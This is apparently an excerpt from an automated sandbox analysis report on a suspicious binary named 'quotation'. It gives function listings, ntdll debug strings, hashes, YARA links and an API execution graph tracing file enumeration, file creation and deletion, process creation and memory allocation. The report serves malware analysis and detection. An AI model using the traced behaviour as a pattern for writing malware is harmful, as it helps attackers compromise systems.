                                                                                  • Opcode ID: 17d89f9d2564be9151c0b8dc19487832e99de1cea099ba599b5a03804bf283cf
                                                                                  • Instruction ID: fa2ff6d5fd44e55ed7cb49c58acfd9826ab12a9b351ab96ae3ebd6350d8124b4
                                                                                  • Opcode Fuzzy Hash: 17d89f9d2564be9151c0b8dc19487832e99de1cea099ba599b5a03804bf283cf
                                                                                  • Instruction Fuzzy Hash: 67512571A00646AFCB35DF9CC89097FFBFCEB44208B41C45AE5D6D7685E6B4DA408760
                                                                                  Function 012E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01324725
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01324655
                                                                                  • ExecuteOptions, xrefs: 013246A0
                                                                                  • Execute=1, xrefs: 01324713
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01324742
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013246FC
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01324787
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: 59d87dd2310a48cd89c4f893b6799ce62e2525bd5535920a059ed239ccebe6a4
                                                                                  • Instruction ID: ce93c53b37f40ebc8fd8b64de25ba11f0575e226d603858d258281758406d11f
                                                                                  • Opcode Fuzzy Hash: 59d87dd2310a48cd89c4f893b6799ce62e2525bd5535920a059ed239ccebe6a4
                                                                                  • Instruction Fuzzy Hash: AE512D3161021ABEEF15EAA9DC49FFE77ECAF14318F4400A9D605A7190D7709A458F91
                                                                                  Function 01386940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction ID: fa25a6528329eb523fac7d50ded74a1030cad8f69a337f4e420542d5ca3877bd
                                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction Fuzzy Hash: 8B0226B1508342AFD705EF28C590A6BBBE5EFC8708F14892DFA894B250DB31E905CB52
                                                                                  Function 012FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: b646757ba961a5c656adcf50d40cc58830731fd1d0598c3929c24ad7da836908
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: 6D81C471E2524A9EEF298E6CC8917FEFBB6AF85310F18413DDB51A7291C7349840CB51
                                                                                  Function 013620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  • Opcode ID: 631b5212e18170cc8d30d743925272fe88b4c58d16606adab46742ec4b5c3fd6
                                                                                  • Instruction ID: e034b90363cb26b2bc1bc9a27a1908b42cb1dac76435215e1113819f6ce17896
                                                                                  • Opcode Fuzzy Hash: 631b5212e18170cc8d30d743925272fe88b4c58d16606adab46742ec4b5c3fd6
                                                                                  • Instruction Fuzzy Hash: D021537AE10119ABDB11DF69CC50AFFBBECAF54644F45412AEA05E3244E730DA018BA1
                                                                                  Function 012DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 0132031E
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013202E7
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013202BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: 2baf1246633fd5589f2515e8694a1935798e695677fd8bf32cc92698d79eba29
                                                                                  • Instruction ID: 7e638f1b3811ec7747c9ef44a37ad9a76dad0e942394bdd57bafc51da1f839e9
                                                                                  • Opcode Fuzzy Hash: 2baf1246633fd5589f2515e8694a1935798e695677fd8bf32cc92698d79eba29
                                                                                  • Instruction Fuzzy Hash: 86E1D0306247429FE729DF28C985B2ABBE0BB85318F140A1DF6A6CB2D1D774D845CB46
                                                                                  Function 012EBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 01327BAC
                                                                                  • RTL: Resource at %p, xrefs: 01327B8E
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01327B7F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: 14f6519e90b43f85c974d7ead204bebdc610a152bf8ed021548880b75d9bf7b0
                                                                                  • Instruction ID: 58c1577a418514c554c650ee6ac3f2938842ec7aa93f5928937dbe68893a2073
                                                                                  • Opcode Fuzzy Hash: 14f6519e90b43f85c974d7ead204bebdc610a152bf8ed021548880b75d9bf7b0
                                                                                  • Instruction Fuzzy Hash: A74100357117039FDB21DE29C845B2AB7E5FF98714F400A2DFA5ADB280DB71E8058B91
                                                                                  Function 012EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0132728C
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 013272C1
                                                                                  • RTL: Resource at %p, xrefs: 013272A3
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01327294
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: 782a50b727ef608923bdca9b373c9aa49e7cb93ad4e7917bcfdb2cea8448fdac
                                                                                  • Instruction ID: 6297b7758375786c06dddc017f1926b91395ea9337147247bd4e7c923fd4e7f5
                                                                                  • Opcode Fuzzy Hash: 782a50b727ef608923bdca9b373c9aa49e7cb93ad4e7917bcfdb2cea8448fdac
                                                                                  • Instruction Fuzzy Hash: E1411035710317ABD721EE29CC41B66B7E5FBA5718F100618F955EB280DB30F81287D1
                                                                                  Function 01362300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: 2272d77e717a04d85afe40aa72648bb9367b98ffc0655b5d5d9e4ad406818bcd
                                                                                  • Instruction ID: 6aa4cfbdc1bcde0061fe3b1d1fc6005183e242fc3a2a2f81e8bfb425a07d9095
                                                                                  • Opcode Fuzzy Hash: 2272d77e717a04d85afe40aa72648bb9367b98ffc0655b5d5d9e4ad406818bcd
                                                                                  • Instruction Fuzzy Hash: E531B172A102199FDB20DE2DCC40BFFB7FCEB04654F95445AE949E3244EB30AA448BA0
                                                                                  Function 012F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction ID: 9f408157e56de124c8c1721d2097cd780b54ddc73620f8655f6fcaf4da779e85
                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction Fuzzy Hash: 4591A071E2020B9BEB24DF6DC881ABEFBA5AF44720F54463EEB55E72C0D77099418B11
                                                                                  Function 012B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_1280000_quotation.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: e31412a27819a56ac075f15c5fff98fe3796d95f8599dea1220f368bbfda1465
                                                                                  • Instruction ID: 955be05cc14bd9113e5acc8b9b073c78985e4d7be319e5d620215bf1b216e059
                                                                                  • Opcode Fuzzy Hash: e31412a27819a56ac075f15c5fff98fe3796d95f8599dea1220f368bbfda1465
                                                                                  • Instruction Fuzzy Hash: D6811BB1D10269DBDB35CB54CC45BEEB6B8AF08754F1041EAEA19B7280E7705E84CFA0

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.6%
                                                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                                                  Signature Coverage:2.2%
                                                                                  Total number of Nodes:447
                                                                                  Total number of Limit Nodes:72
                                                                                  execution_graph 97127 2a19ea0 97130 2a1a32a 97127->97130 97129 2a1a7c4 97130->97129 97131 2a3b3d0 97130->97131 97132 2a3b3f6 97131->97132 97137 2a14140 97132->97137 97134 2a3b402 97135 2a3b43b 97134->97135 97140 2a357c0 97134->97140 97135->97129 97138 2a1414d 97137->97138 97144 2a234e0 97137->97144 97138->97134 97141 2a35822 97140->97141 97143 2a3582f 97141->97143 97168 2a21ce0 97141->97168 97143->97135 97145 2a234fd 97144->97145 97147 2a23516 97145->97147 97148 2a3a130 97145->97148 97147->97138 97149 2a3a14a 97148->97149 97150 2a3a179 97149->97150 97155 2a38cc0 97149->97155 97150->97147 97156 2a38cdd 97155->97156 97162 3242c0a 97156->97162 97157 2a38d09 97159 2a3b770 97157->97159 97165 2a39a30 97159->97165 97161 2a3a1ef 97161->97147 97163 3242c11 97162->97163 97164 3242c1f LdrInitializeThunk 97162->97164 97163->97157 97164->97157 97166 2a39a4d 97165->97166 97167 2a39a5e RtlFreeHeap 97166->97167 97167->97161 97169 2a21d1b 97168->97169 97184 2a28140 97169->97184 97171 2a21d23 97183 2a21ff6 97171->97183 97195 2a3b850 97171->97195 97173 2a21d39 97174 2a3b850 RtlAllocateHeap 97173->97174 97175 2a21d4a 97174->97175 97176 2a3b850 RtlAllocateHeap 97175->97176 97177 2a21d5b 97176->97177 97179 2a21df2 97177->97179 97206 2a26cf0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97177->97206 97198 2a24820 97179->97198 97181 2a21fa2 97202 2a38100 97181->97202 97183->97143 97185 2a2816c 97184->97185 97207 2a28030 97185->97207 97188 2a28199 97189 2a281a4 97188->97189 97213 2a396b0 97188->97213 97189->97171 97190 2a281b1 97191 2a281cd 97190->97191 97193 2a396b0 NtClose 97190->97193 97191->97171 97194 2a281c3 97193->97194 97194->97171 97221 2a399e0 97195->97221 97197 2a3b86b 97197->97173 97199 2a24844 97198->97199 97200 2a24880 LdrLoadDll 97199->97200 97201 2a2484b 97199->97201 97200->97201 97201->97181 97203 2a38162 97202->97203 97204 2a3816f 97203->97204 97224 2a22010 97203->97224 97204->97183 97206->97179 97208 2a28126 97207->97208 97209 2a2804a 97207->97209 97208->97188 97208->97190 97216 2a38d60 97209->97216 97212 2a396b0 NtClose 97212->97208 97214 2a396ca 97213->97214 97215 2a396db NtClose 97214->97215 97215->97189 97217 2a38d7d 97216->97217 97220 32435c0 LdrInitializeThunk 97217->97220 97218 2a2811a 97218->97212 97220->97218 97222 2a399fd 97221->97222 97223 2a39a0e RtlAllocateHeap 97222->97223 97223->97197 97240 2a28410 97224->97240 97226 2a22563 97226->97204 97227 2a22030 97227->97226 97244 2a31330 97227->97244 97230 2a2223c 97252 2a3c940 97230->97252 97231 2a22088 97231->97226 97247 2a3c810 97231->97247 97234 2a22251 97236 2a22298 97234->97236 97258 2a20b30 97234->97258 97236->97226 97237 2a20b30 LdrInitializeThunk 97236->97237 97261 2a283b0 97236->97261 97237->97236 97238 2a223e9 97238->97236 97239 2a283b0 LdrInitializeThunk 97238->97239 97239->97238 97241 2a2841d 97240->97241 97242 2a28441 97241->97242 97243 2a2843a SetErrorMode 97241->97243 97242->97227 97243->97242 97265 2a3b6e0 97244->97265 97246 2a31351 97246->97231 97248 2a3c820 97247->97248 97249 2a3c826 97247->97249 97248->97230 97250 2a3b850 RtlAllocateHeap 97249->97250 97251 2a3c84c 97250->97251 97251->97230 97253 2a3c8b0 97252->97253 97254 2a3b850 RtlAllocateHeap 97253->97254 97256 2a3c90d 97253->97256 97255 2a3c8ea 97254->97255 97257 2a3b770 RtlFreeHeap 97255->97257 97256->97234 97257->97256 97259 2a20b52 97258->97259 97272 2a39940 97258->97272 97259->97238 97262 2a283c3 97261->97262 97277 2a38bc0 97262->97277 97264 2a283ee 97264->97236 97268 2a39820 97265->97268 97267 2a3b711 97267->97246 97269 2a398b5 97268->97269 97271 2a3984b 97268->97271 97270 2a398cb NtAllocateVirtualMemory 97269->97270 97270->97267 97271->97267 97273 2a3995a 97272->97273 97276 3242c70 LdrInitializeThunk 97273->97276 97274 2a39982 97274->97259 97276->97274 97278 2a38c41 97277->97278 97279 2a38bee 97277->97279 97282 3242dd0 LdrInitializeThunk 97278->97282 97279->97264 97280 2a38c66 97280->97264 97282->97280 97283 2a233e3 97284 2a28030 2 API calls 97283->97284 97285 2a233f3 97284->97285 97286 2a396b0 NtClose 97285->97286 97287 2a2340f 97285->97287 97286->97287 97288 2a210a0 97289 2a210b9 97288->97289 97290 2a24820 LdrLoadDll 97289->97290 97291 2a210d7 97290->97291 97292 2a21123 97291->97292 97293 2a21110 PostThreadMessageW 97291->97293 97293->97292 97294 2a2fa60 97295 2a2fac4 97294->97295 97323 2a26590 97295->97323 97297 2a2fbfe 97298 2a2fbf7 97298->97297 97330 2a266a0 97298->97330 97300 2a2fda3 97301 2a2fc7a 97301->97300 97302 2a2fdb2 97301->97302 97334 2a2f840 97301->97334 97303 2a396b0 NtClose 97302->97303 97305 2a2fdbc 97303->97305 97306 2a2fcb6 97306->97302 97307 2a2fcc1 97306->97307 97308 2a3b850 RtlAllocateHeap 97307->97308 97309 2a2fcea 97308->97309 97310 2a2fcf3 97309->97310 97311 2a2fd09 97309->97311 97312 2a396b0 NtClose 97310->97312 97343 2a2f730 CoInitialize 97311->97343 97314 2a2fcfd 97312->97314 97315 2a2fd17 97346 2a39160 97315->97346 97317 2a2fd92 97318 2a396b0 NtClose 97317->97318 97319 2a2fd9c 97318->97319 97320 2a3b770 RtlFreeHeap 97319->97320 97320->97300 97321 2a2fd35 97321->97317 97322 2a39160 LdrInitializeThunk 97321->97322 97322->97321 97324 2a265c3 97323->97324 97325 2a265e7 97324->97325 97350 2a39200 97324->97350 97325->97298 97327 2a2660a 97327->97325 97328 2a396b0 NtClose 97327->97328 97329 2a2668c 97328->97329 97329->97298 97331 2a266c5 97330->97331 97355 2a38fe0 97331->97355 97335 2a2f85c 97334->97335 97336 2a24820 LdrLoadDll 97335->97336 97338 2a2f87a 97336->97338 97337 2a2f883 97337->97306 97338->97337 97339 2a24820 LdrLoadDll 97338->97339 97340 2a2f94e 97339->97340 97341 2a24820 LdrLoadDll 97340->97341 97342 2a2f9a8 97340->97342 97341->97342 97342->97306 97345 2a2f795 97343->97345 97344 2a2f82b CoUninitialize 97344->97315 97345->97344 97347 2a3917a 97346->97347 97360 3242ba0 LdrInitializeThunk 97347->97360 97348 2a391aa 97348->97321 97351 2a3921a 97350->97351 97354 3242ca0 LdrInitializeThunk 97351->97354 97352 2a39246 97352->97327 97354->97352 97356 2a38ffa 97355->97356 97359 3242c60 LdrInitializeThunk 97356->97359 97357 2a26739 97357->97301 97359->97357 97360->97348 97361 2a27060 97362 2a2708a 97361->97362 97365 2a281e0 97362->97365 97364 2a270b4 97366 2a281fd 97365->97366 97372 2a38db0 97366->97372 97368 2a2824d 97369 2a28254 97368->97369 97377 2a38e90 97368->97377 97369->97364 97371 2a2827d 97371->97364 97373 2a38e4e 97372->97373 97375 2a38dde 97372->97375 97382 3242f30 LdrInitializeThunk 97373->97382 97374 2a38e87 97374->97368 97375->97368 97378 2a38f41 97377->97378 97379 2a38ebf 97377->97379 97383 3242d10 LdrInitializeThunk 97378->97383 97379->97371 97380 2a38f86 97380->97371 97382->97374 97383->97380 97384 2a2c860 97386 2a2c889 97384->97386 97385 2a2c981 97386->97385 97387 2a2c927 FindFirstFileW 97386->97387 97387->97385 97389 2a2c942 97387->97389 97388 2a2c968 FindNextFileW 97388->97389 97390 2a2c97a FindClose 97388->97390 97389->97388 97390->97385 97396 2a3b460 97397 2a3b46b 97396->97397 97398 2a3b48a 97397->97398 97400 2a35cb0 97397->97400 97401 2a35d11 97400->97401 97403 2a35d1e 97401->97403 97404 2a225e0 97401->97404 97403->97398 97405 2a22584 97404->97405 97406 2a225f8 97404->97406 97407 2a38cc0 LdrInitializeThunk 97405->97407 97408 2a225b6 97407->97408 97411 2a39750 97408->97411 97410 2a225cb 97410->97403 97412 2a397e2 97411->97412 97413 2a3977e 97411->97413 97416 3242e80 LdrInitializeThunk 97412->97416 97413->97410 97414 2a39813 97414->97410 97416->97414 97417 2a359a0 97418 2a35a01 97417->97418 97420 2a35a0e 97418->97420 97421 2a27660 97418->97421 97422 2a2766e 97421->97422 97423 2a2760f 97421->97423 97422->97420 97424 2a27652 97423->97424 97426 2a2b500 97423->97426 97424->97420 97427 2a2b526 97426->97427 97428 2a2b749 97427->97428 97429 2a2b598 97427->97429 97453 2a39ac0 97427->97453 97428->97424 97429->97428 97431 2a3c940 2 API calls 97429->97431 97432 2a2b5b7 97431->97432 97432->97428 97433 2a2b688 97432->97433 97434 2a38cc0 LdrInitializeThunk 97432->97434 97436 2a25e00 LdrInitializeThunk 97433->97436 97437 2a2b6a4 97433->97437 97435 2a2b619 97434->97435 97435->97433 97441 2a2b622 97435->97441 97436->97437 97439 2a2b731 97437->97439 97460 2a38830 97437->97460 97438 2a2b670 97440 2a283b0 LdrInitializeThunk 97438->97440 97446 2a283b0 LdrInitializeThunk 97439->97446 97445 2a2b67e 97440->97445 97441->97428 97441->97438 97442 2a2b651 97441->97442 97456 2a25e00 97441->97456 97475 2a34940 LdrInitializeThunk 97442->97475 97445->97424 97449 2a2b73f 97446->97449 97448 2a2b708 97465 2a388e0 97448->97465 97449->97424 97451 2a2b722 97470 2a38a40 97451->97470 97454 2a39add 97453->97454 97455 2a39aee CreateProcessInternalW 97454->97455 97455->97429 97457 2a25e15 97456->97457 97458 2a38e90 LdrInitializeThunk 97457->97458 97459 2a25e3e 97458->97459 97459->97442 97461 2a388ad 97460->97461 97462 2a3885b 97460->97462 97476 32439b0 LdrInitializeThunk 97461->97476 97462->97448 97463 2a388d2 97463->97448 97466 2a38960 97465->97466 97468 2a3890e 97465->97468 97477 3244340 LdrInitializeThunk 97466->97477 97467 2a38985 97467->97451 97468->97451 97471 2a38abd 97470->97471 97473 2a38a6b 97470->97473 97478 3242fb0 LdrInitializeThunk 97471->97478 97472 2a38ae2 97472->97439 97473->97439 97475->97438 97476->97463 97477->97467 97478->97472 97479 2a393a0 97480 2a3945a 97479->97480 97482 2a393d2 97479->97482 97481 2a39470 NtCreateFile 97480->97481 97483 2a30320 97484 2a3033d 97483->97484 97485 2a24820 LdrLoadDll 97484->97485 97486 2a3035b 97485->97486 97487 2a31960 97488 2a3197c 97487->97488 97489 2a319a4 97488->97489 97490 2a319b8 97488->97490 97491 2a396b0 NtClose 97489->97491 97492 2a396b0 NtClose 97490->97492 97493 2a319ad 97491->97493 97494 2a319c1 97492->97494 97497 2a3b890 RtlAllocateHeap 97494->97497 97496 2a319cc 97497->97496 97500 2a38af0 97501 2a38b82 97500->97501 97502 2a38b1e 97500->97502 97505 3242ee0 LdrInitializeThunk 97501->97505 97503 2a38bb3 97505->97503 97511 2a31cf0 97512 2a31d09 97511->97512 97513 2a31d99 97512->97513 97514 2a31d51 97512->97514 97517 2a31d94 97512->97517 97515 2a3b770 RtlFreeHeap 97514->97515 97516 2a31d61 97515->97516 97518 2a3b770 RtlFreeHeap 97517->97518 97518->97513 97519 2a36230 97520 2a3628a 97519->97520 97522 2a36297 97520->97522 97523 2a33c40 97520->97523 97524 2a3b6e0 NtAllocateVirtualMemory 97523->97524 97526 2a33c81 97524->97526 97525 2a33d8e 97525->97522 97526->97525 97527 2a24820 LdrLoadDll 97526->97527 97529 2a33cc7 97527->97529 97528 2a33d10 Sleep 97528->97529 97529->97525 97529->97528 97530 2a38c70 97531 2a38c8d 97530->97531 97534 3242df0 LdrInitializeThunk 97531->97534 97532 2a38cb5 97534->97532 97535 2a3c870 97536 2a3b770 RtlFreeHeap 97535->97536 97537 2a3c885 97536->97537 97539 2a19e40 97541 2a19e4f 97539->97541 97540 2a19e8c 97541->97540 97542 2a19e79 CreateThread 97541->97542 97543 2a25e80 97544 2a283b0 LdrInitializeThunk 97543->97544 97545 2a25eb0 97544->97545 97547 2a25edc 97545->97547 97548 2a28330 97545->97548 97549 2a28374 97548->97549 97554 2a28395 97549->97554 97555 2a38990 97549->97555 97551 2a28385 97552 2a283a1 97551->97552 97553 2a396b0 NtClose 97551->97553 97552->97545 97553->97554 97554->97545 97556 2a38a10 97555->97556 97557 2a389be 97555->97557 97560 3244650 LdrInitializeThunk 97556->97560 97557->97551 97558 2a38a35 97558->97551 97560->97558 97561 2a27400 97562 2a27414 97561->97562 97564 2a396b0 NtClose 97562->97564 97570 2a2746f 97562->97570 97563 2a275a7 97565 2a27437 97564->97565 97571 2a26820 NtClose LdrInitializeThunk LdrInitializeThunk 97565->97571 97567 2a27581 97567->97563 97573 2a269f0 NtClose LdrInitializeThunk LdrInitializeThunk 97567->97573 97570->97563 97572 2a26820 NtClose LdrInitializeThunk LdrInitializeThunk 97570->97572 97571->97570 97572->97567 97573->97563 97574 2a28ac7 97576 2a28a81 97574->97576 97575 2a28af1 97576->97574 97576->97575 97578 2a27380 97576->97578 97579 2a27396 97578->97579 97581 2a273cf 97578->97581 97579->97581 97582 2a271f0 LdrLoadDll 97579->97582 97581->97576 97582->97581 97583 2a29ecb 97584 2a29ed1 97583->97584 97585 2a29efd 97584->97585 97586 2a3b770 RtlFreeHeap 97584->97586 97586->97585 97587 2a1b810 97588 2a3b6e0 NtAllocateVirtualMemory 97587->97588 97589 2a1ce81 97588->97589 97590 2a2afd0 97595 2a2ace0 97590->97595 97592 2a2afdd 97609 2a2a960 97592->97609 97594 2a2aff9 97596 2a2ad05 97595->97596 97620 2a28620 97596->97620 97599 2a2ae53 97599->97592 97601 2a2ae6a 97601->97592 97602 2a2ae61 97602->97601 97604 2a2af57 97602->97604 97639 2a2a3b0 97602->97639 97606 2a2afba 97604->97606 97648 2a2a720 97604->97648 97607 2a3b770 RtlFreeHeap 97606->97607 97608 2a2afc1 97607->97608 97608->97592 97610 2a2a976 97609->97610 97617 2a2a981 97609->97617 97611 2a3b850 RtlAllocateHeap 97610->97611 97611->97617 97612 2a2a9a2 97612->97594 97613 2a28620 GetFileAttributesW 97613->97617 97614 2a2acb2 97615 2a2accb 97614->97615 97616 2a3b770 RtlFreeHeap 97614->97616 97615->97594 97616->97615 97617->97612 97617->97613 97617->97614 97618 2a2a3b0 RtlFreeHeap 97617->97618 97619 2a2a720 RtlFreeHeap 97617->97619 97618->97617 97619->97617 97621 2a2863d 97620->97621 97622 2a28644 GetFileAttributesW 97621->97622 97623 2a2864f 97621->97623 97622->97623 97623->97599 97624 2a33520 97623->97624 97625 2a3352e 97624->97625 97626 2a33535 97624->97626 97625->97602 97627 2a24820 LdrLoadDll 97626->97627 97628 2a3356a 97627->97628 97629 2a33579 97628->97629 97652 2a32fe0 LdrLoadDll 97628->97652 97631 2a3b850 RtlAllocateHeap 97629->97631 97635 2a33724 97629->97635 97632 2a33592 97631->97632 97633 2a3371a 97632->97633 97632->97635 97636 2a335ae 97632->97636 97634 2a3b770 RtlFreeHeap 97633->97634 97633->97635 97634->97635 97635->97602 97636->97635 97637 2a3b770 RtlFreeHeap 97636->97637 97638 2a3370e 97637->97638 97638->97602 97640 2a2a3d6 97639->97640 97653 2a2ddb0 97640->97653 97642 2a2a448 97644 2a2a5d0 97642->97644 97646 2a2a466 97642->97646 97643 2a2a5b5 97643->97602 97644->97643 97645 2a2a270 RtlFreeHeap 97644->97645 97645->97644 97646->97643 97658 2a2a270 97646->97658 97649 2a2a746 97648->97649 97650 2a2ddb0 RtlFreeHeap 97649->97650 97651 2a2a7cd 97650->97651 97651->97604 97652->97629 97655 2a2ddd4 97653->97655 97654 2a2dde1 97654->97642 97655->97654 97656 2a3b770 RtlFreeHeap 97655->97656 97657 2a2de1e 97656->97657 97657->97642 97659 2a2a28d 97658->97659 97662 2a2de30 97659->97662 97661 2a2a393 97661->97646 97663 2a2de54 97662->97663 97664 2a2defe 97663->97664 97665 2a3b770 RtlFreeHeap 97663->97665 97664->97661 97665->97664 97666 2a39610 97667 2a39687 97666->97667 97669 2a3963b 97666->97669 97668 2a3969d NtDeleteFile 97667->97668 97675 2a39510 97676 2a395ba 97675->97676 97678 2a3953e 97675->97678 97677 2a395d0 NtReadFile 97676->97677 97679 3242ad0 LdrInitializeThunk 97680 2a22a57 97681 2a26590 2 API calls 97680->97681 97682 2a22a80 97681->97682

